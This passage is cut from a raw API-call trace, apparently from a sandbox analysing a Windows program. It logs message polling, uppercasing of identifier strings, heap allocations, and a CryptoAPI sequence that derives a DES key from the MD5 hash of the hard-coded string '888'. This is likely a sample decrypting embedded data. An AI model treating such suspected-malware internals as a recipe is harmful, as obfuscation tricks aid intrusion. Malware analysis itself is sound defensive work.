wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.056] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.056] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.057] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.057] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.057] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.057] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.057] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.057] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.057] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.058] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.058] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.058] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.058] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.058] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.058] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.059] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.059] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.059] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.059] CryptCreateHash (in: hProv=0xa7c2a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.060] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.060] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.060] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.060] CryptHashData (hHash=0x9e1db8, pbData=0x2a71d88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0211.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0211.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7080 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0211.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0211.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0211.062] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.062] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0211.063] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0211.063] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0211.063] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0211.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0211.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aab410 [0211.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab410, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.064] CryptDeriveKey (in: hProv=0xa7c2a8, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0211.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0211.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0211.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0211.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0211.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 